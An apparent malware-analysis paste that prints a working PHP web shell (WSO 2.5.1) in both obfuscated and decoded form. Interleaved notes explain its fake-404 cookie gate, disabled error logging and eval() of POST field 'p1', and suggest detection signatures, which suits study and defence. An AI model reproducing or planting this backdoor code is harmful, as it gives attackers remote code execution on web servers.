
Random PHP Malware

scurit Sep 25th, 2014 207 Never
  1. <?php /* Analyst note: obfuscated form of the sample; the page's own decode of the same code
     follows further down. Two layers are visible here: (1) string literals written with
     double-quoted \xNN escapes, e.g. "\x47LOB\x41\x4c\x53" is "GLOBALS"; (2) variable-variables,
     where ${"GLOBALS"}["<random key>"] stores a variable NAME that is later dereferenced with
     ${...}. The script defines WSO_VERSION "2.5.1", suppresses error logging with @ini_set, and
     passes POST field "p1" to eval(). Static-detection candidates: dense \x escapes inside
     ${"..."} expressions, the WSO* function names, and eval() applied to a $_POST element. */ ${"\x47LOB\x41\x4c\x53"}["\x76\x72vw\x65y\x70\x7an\x69\x70\x75"]="a";${"\x47\x4cOBAL\x53"}["\x67\x72\x69u\x65\x66\x62\x64\x71c"]="\x61\x75\x74h\x5fpas\x73";${"\x47\x4cOBAL\x53"}["\x63\x74xv\x74\x6f\x6f\x6bn\x6dju"]="\x76";${"\x47\x4cO\x42A\x4cS"}["p\x69\x6fykc\x65\x61"]="def\x61ul\x74\x5fu\x73\x65_\x61j\x61\x78";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["i\x77i\x72\x6d\x78l\x71tv\x79p"]="defa\x75\x6c\x74\x5f\x61\x63t\x69\x6f\x6e";${"\x47L\x4fB\x41\x4cS"}["\x64\x77e\x6d\x62\x6a\x63"]="\x63\x6fl\x6f\x72";${${"\x47\x4c\x4f\x42\x41LS"}["\x64\x77\x65\x6dbj\x63"]}="\x23d\x665";${${"\x47L\x4fB\x41\x4c\x53"}["\x69\x77\x69rm\x78\x6c\x71\x74\x76\x79p"]}="\x46i\x6cesM\x61n";$oboikuury="\x64e\x66a\x75\x6ct\x5fc\x68\x61\x72\x73\x65t";${${"\x47L\x4f\x42\x41\x4cS"}["p\x69oy\x6bc\x65\x61"]}=true;${$oboikuury}="\x57indow\x73-1\x325\x31";@ini_set("\x65r\x72o\x72_\x6cog",NULL);@ini_set("l\x6fg_er\x72ors",0);@ini_set("max_ex\x65\x63\x75\x74\x69o\x6e\x5f\x74im\x65",0);@set_time_limit(0);@set_magic_quotes_runtime(0);@define("WS\x4f\x5fVE\x52S\x49ON","\x32.5\x2e1");if(get_magic_quotes_gpc()){function WSOstripslashes($array){${"\x47\x4c\x4f\x42A\x4c\x53"}["\x7a\x64\x69z\x62\x73\x75e\x66a"]="\x61\x72r\x61\x79";$cfnrvu="\x61r\x72a\x79";${"GLOB\x41L\x53"}["\x6b\x63\x6ct\x6c\x70\x64\x73"]="a\x72\x72\x61\x79";return is_array(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x7ad\x69\x7ab\x73\x75e\x66\x61"]})?array_map("\x57SOst\x72\x69\x70\x73\x6c\x61\x73\x68\x65s",${${"\x47\x4cO\x42\x41LS"}["\x6b\x63\x6c\x74l\x70\x64\x73"]}):stripslashes(${$cfnrvu});}$_POST=WSOstripslashes($_POST);$_COOKIE=WSOstripslashes($_COOKIE);}function wsoLogin(){header("\x48\x54TP/1.\x30\x204\x30\x34\x20\x4eo\x74 \x46ound");die("4\x304");}function 
WSOsetcookie($k,$v){${"\x47\x4cO\x42ALS"}["\x67vf\x6c\x78m\x74"]="\x6b";$cjtmrt="\x76";$_COOKIE[${${"G\x4c\x4f\x42\x41LS"}["\x67\x76\x66\x6cxm\x74"]}]=${${"GLO\x42\x41\x4cS"}["\x63\x74\x78\x76t\x6f\x6fknm\x6a\x75"]};$raogrsixpi="\x6b";setcookie(${$raogrsixpi},${$cjtmrt});}$qyvsdolpq="a\x75\x74\x68\x5f\x70\x61s\x73";if(!empty(${$qyvsdolpq})){$rhavvlolc="au\x74h_\x70a\x73\x73";$ssfmrro="a\x75t\x68\x5fpa\x73\x73";if(isset($_POST["p\x61ss"])&&(md5($_POST["pa\x73\x73"])==${$ssfmrro}))WSOsetcookie(md5($_SERVER["H\x54\x54P_\x48\x4f\x53T"]),${${"\x47L\x4f\x42\x41\x4c\x53"}["\x67\x72\x69\x75e\x66b\x64\x71\x63"]});if(!isset($_COOKIE[md5($_SERVER["\x48T\x54\x50\x5f\x48O\x53\x54"])])||($_COOKIE[md5($_SERVER["H\x54\x54\x50_H\x4fST"])]!=${$rhavvlolc}))wsoLogin();}function actionRC(){if(!@$_POST["p\x31"]){$ugtfpiyrum="a";${${"\x47\x4c\x4fB\x41LS"}["\x76r\x76w\x65\x79\x70z\x6eipu"]}=array("\x75n\x61m\x65"=>php_uname(),"p\x68\x70\x5fver\x73\x69o\x6e"=>phpversion(),"\x77s\x6f_v\x65\x72si\x6f\x6e"=>WSO_VERSION,"saf\x65m\x6f\x64e"=>@ini_get("\x73\x61\x66\x65\x5fm\x6fd\x65"));echo serialize(${$ugtfpiyrum});}else{eval($_POST["\x70\x31"]);}}if(empty($_POST["\x61"])){${"\x47L\x4fB\x41LS"}["\x69s\x76\x65\x78\x79"]="\x64\x65\x66\x61\x75\x6ct\x5f\x61c\x74i\x6f\x6e";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x75\x6f\x65c\x68\x79\x6d\x7ad\x64\x64"]="\x64\x65\x66a\x75\x6c\x74_\x61\x63\x74\x69\x6fn";if(isset(${${"\x47L\x4f\x42\x41LS"}["\x69\x77ir\x6d\x78lqtv\x79\x70"]})&&function_exists("\x61ct\x69\x6f\x6e".${${"\x47L\x4f\x42\x41\x4cS"}["\x75o\x65ch\x79\x6d\x7a\x64\x64\x64"]}))$_POST["a"]=${${"\x47\x4c\x4f\x42ALS"}["i\x73\x76e\x78\x79"]};else$_POST["a"]="\x53e\x63\x49\x6e\x66o";}if(!empty($_POST["\x61"])&&function_exists("actio\x6e".$_POST["\x61"]))call_user_func("\x61\x63\x74\x69\x6f\x6e".$_POST["a"]);exit;
  2. ?>
  3.  
  4.  
  5. ----------------------------------------
  6. DECODES TO:
  7. -----------------------------------------
  8.  
  9. <?php $ {
  10.     "GLOBALS"
  11. }
  12. ["vrvweypznipu"] = "a"; // $GLOBALS["vrvweypznipu"] = "a" (name later dereferenced in actionRC)
      // Analyst note: setup preamble, running from the opening tag to the define() below.
      // It first fills $GLOBALS with randomly named keys whose VALUES are variable names, then
      // dereferences them with ${...} so that the real names ($color, $default_action, ...) never
      // appear as plain identifiers. After that it turns off PHP error logging and the execution
      // time limit for the request and defines WSO_VERSION, by which the sample identifies
      // itself as "2.5.1". The random key names are per-sample and make poor signatures; the
      // string values and the ini_set() pattern are more stable.
  13. $ {
  14.     "GLOBALS"
  15. }
  16. ["griuefbdqc"] = "auth_pass"; // name of the variable read by the access gate
  17. $ {
  18.     "GLOBALS"
  19. }
  20. ["ctxvtooknmju"] = "v"; // name dereferenced inside WSOsetcookie (its $v parameter)
  21. $ {
  22.     "GLOBALS"
  23. }
  24. ["pioykcea"] = "default_use_ajax";
  25. $ {
  26.     "GLOBALS"
  27. }
  28. ["iwirmxlqtvyp"] = "default_action";
  29. $ {
  30.     "GLOBALS"
  31. }
  32. ["dwembjc"] = "color";
  33. $ {
  34.     $ {
  35.         "GLOBALS"
  36.     }
  37.     ["dwembjc"]
  38. } = "#df5"; // resolves to $color = "#df5"
  39. $ {
  40.     $ {
  41.         "GLOBALS"
  42.     }
  43.     ["iwirmxlqtvyp"]
  44. } = "FilesMan"; // resolves to $default_action = "FilesMan"
  45. $oboikuury = "default_charset";
  46. $ {
  47.     $ {
  48.         "GLOBALS"
  49.     }
  50.     ["pioykcea"]
  51. } = true; // resolves to $default_use_ajax = true
  52. $ {
  53.     $oboikuury
  54. } = "Windows-1251"; // resolves to $default_charset = "Windows-1251"
  55. @ini_set("error_log", NULL); // clears the error-log destination; @ hides any failure of the call itself
  56. @ini_set("log_errors", 0); // switches PHP error logging off, so errors raised here leave no PHP log entry
  57. @ini_set("max_execution_time", 0); // 0 = no execution time limit
  58. @set_time_limit(0); // same limit removed through the runtime API
  59. @set_magic_quotes_runtime(0); // NOTE(review): this function was removed in PHP 7.0, which suggests a PHP 5.x target; compare with the PHP version on the affected host
  60. @define("WSO_VERSION", "2.5.1"); // self-reported family/version string; later echoed by actionRC
  61. if (get_magic_quotes_gpc()) {
      // Input normalisation: only when magic quotes are on, undo the automatic backslash
      // escaping on $_POST and $_COOKIE so that request values arrive exactly as sent.
      // NOTE(review): get_magic_quotes_gpc() was removed in PHP 8.0; compare with the PHP
      // version on the affected host.
  62.     function WSOstripslashes($array) {
          // Recursively applies stripslashes(): arrays are walked with array_map calling this
          // same function by name, anything else is passed to stripslashes() directly.
          // All three indirections below resolve to the $array parameter.
  63.         $ {
  64.             "GLOBALS"
  65.         }
  66.         ["zdizbsuefa"] = "array";
  67.         $cfnrvu = "array";
  68.         $ {
  69.             "GLOBALS"
  70.         }
  71.         ["kcltlpds"] = "array";
  72.         return is_array($ {
  73.             $ {
  74.                 "GLOBALS"
  75.             }
  76.             ["zdizbsuefa"]
  77.         }) ? array_map("WSOstripslashes", $ {
  78.             $ {
  79.                 "GLOBALS"
  80.             }
  81.             ["kcltlpds"]
  82.         }) : stripslashes($ {
  83.             $cfnrvu
  84.         });
  85.     }
  86.     $_POST = WSOstripslashes($_POST); // superglobal overwritten in place with the unescaped copy
  87.     $_COOKIE = WSOstripslashes($_COOKIE); // same for cookies, which the access gate reads
  88. }
  89. function wsoLogin() {
      // Despite the name, no login form is shown: the function sends an HTTP/1.0 404 status
      // line, prints the body "404" and terminates the script. The access gate calls it when
      // the cookie check fails, so a request without the cookie sees what looks like a missing
      // page. Detection: a 404 whose entire body is the string "404", served for a path that
      // exists on disk.
  90.     header("HTTP/1.0 404 Not Found");
  91.     die("404");
  92. }
  93. function WSOsetcookie($k, $v) {
      // Stores cookie $k with value $v twice: in $_COOKIE, so the current request already
      // sees it, and via setcookie(), so the client sends it back on later requests.
      // setcookie() is called with name and value only; no expiry, path or flags are passed.
      // The indirections below resolve to $k and $v.
  94.     $ {
  95.         "GLOBALS"
  96.     }
  97.     ["gvflxmt"] = "k";
  98.     $cjtmrt = "v";
  99.     $_COOKIE[$ {
  100.         $ {
  101.             "GLOBALS"
  102.         }
  103.         ["gvflxmt"]
  104.     }
  105.     ] = $ {
  106.         $ {
  107.             "GLOBALS"
  108.         }
  109.         ["ctxvtooknmju"]
  110.     }; // resolves to $_COOKIE[$k] = $v ("ctxvtooknmju" holds "v", set in the preamble)
  111.     $raogrsixpi = "k";
  112.     setcookie($ {
  113.         $raogrsixpi
  114.     }, $ {
  115.         $cjtmrt
  116.     }); // resolves to setcookie($k, $v)
  117. }
  118. $qyvsdolpq = "auth_pass";
       // Access gate. ${$qyvsdolpq} is $auth_pass, expected to hold an MD5 hex digest.
       // NOTE(review): no assignment to $auth_pass appears anywhere in this listing, so as
       // pasted the !empty() test is false and the whole gate is skipped; the handlers further
       // down would then answer any requester. For incident scoping, check whether the copy
       // recovered from the host sets a hash.
  119. if (!empty($ {
  120.     $qyvsdolpq
  121. })) {
  122.     $rhavvlolc = "auth_pass";
  123.     $ssfmrro = "auth_pass";
       // Login step: md5() of POST field "pass" is compared with $auth_pass using loose ==.
       // On a match, a cookie named md5(Host header) is set, and its value is $auth_pass itself.
  124.     if (isset($_POST["pass"]) && (md5($_POST["pass"]) == $ {
  125.         $ssfmrro
  126.     })) WSOsetcookie(md5($_SERVER["HTTP_HOST"]), $ {
  127.         $ {
  128.             "GLOBALS"
  129.         }
  130.         ["griuefbdqc"]
  131.     });
       // Session check on every request: the cookie named md5(Host header) must exist and equal
       // $auth_pass, otherwise wsoLogin() ends the request with the fake 404.
       // Detection: a request cookie whose NAME is the 32-hex-character MD5 of the Host header.
  132.     if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"]) ]) || ($_COOKIE[md5($_SERVER["HTTP_HOST"]) ] != $ {
  133.         $rhavvlolc
  134.     })) wsoLogin();
  135. }
  136. function actionRC() {
       // The only action* handler defined in this listing; the dispatcher at the end of the file
       // calls it when POST field "a" is "RC". Two modes, selected by POST field "p1":
       //  - "p1" empty or absent: prints a PHP serialize() string of an array with the keys
       //    uname, php_version, wso_version and safemode (a host fingerprint).
       //  - "p1" present: its content is passed to eval(), i.e. request-supplied PHP runs with
       //    the privileges of the web server process.
       // Detection: POST requests to a .php path carrying the fields "a" and "p1"; responses
       // containing a serialized array with the key "wso_version".
  137.     if (!@$_POST["p1"]) {
  138.         $ugtfpiyrum = "a";
  139.         $ {
  140.             $ {
  141.                 "GLOBALS"
  142.             }
  143.             ["vrvweypznipu"]
  144.         } = array("uname" => php_uname(), "php_version" => phpversion(), "wso_version" => WSO_VERSION, "safemode" => @ini_get("safe_mode")); // resolves to $a = array(...)
  145.         echo serialize($ {
  146.             $ugtfpiyrum
  147.         }); // resolves to echo serialize($a)
  148.     } else {
  149.         eval($_POST["p1"]); // eval() on raw request data: the code-execution primitive of this sample
  150.     }
  151. }
  152. if (empty($_POST["a"])) {
       // Default action selection when POST field "a" is missing: use $default_action (set to
       // "FilesMan" earlier in the file) if a function "action" . $default_action exists,
       // otherwise fall back to "SecInfo". Both indirections below resolve to $default_action.
       // NOTE(review): only actionRC is defined in this listing, so as pasted neither default
       // names an existing function and a request without "a" reaches exit with no output.
  153.     $ {
  154.         "GLOBALS"
  155.     }
  156.     ["isvexy"] = "default_action";
  157.     $ {
  158.         "GLOBALS"
  159.     }
  160.     ["uoechymzddd"] = "default_action";
  161.     if (isset($ {
  162.         $ {
  163.             "GLOBALS"
  164.         }
  165.         ["iwirmxlqtvyp"]
  166.     }) && function_exists("action" . $ {
  167.         $ {
  168.             "GLOBALS"
  169.         }
  170.         ["uoechymzddd"]
  171.     })) $_POST["a"] = $ {
  172.         $ {
  173.             "GLOBALS"
  174.         }
  175.         ["isvexy"]
  176.     };
  177.     else $_POST["a"] = "SecInfo";
  178. }
       // Dispatcher: calls the function named "action" followed by POST field "a" when such a
       // function exists. function_exists() is the only check on the request-supplied name.
  179. if (!empty($_POST["a"]) && function_exists("action" . $_POST["a"])) call_user_func("action" . $_POST["a"]);
  180. exit; // nothing after the dispatcher is executed
  181. ?>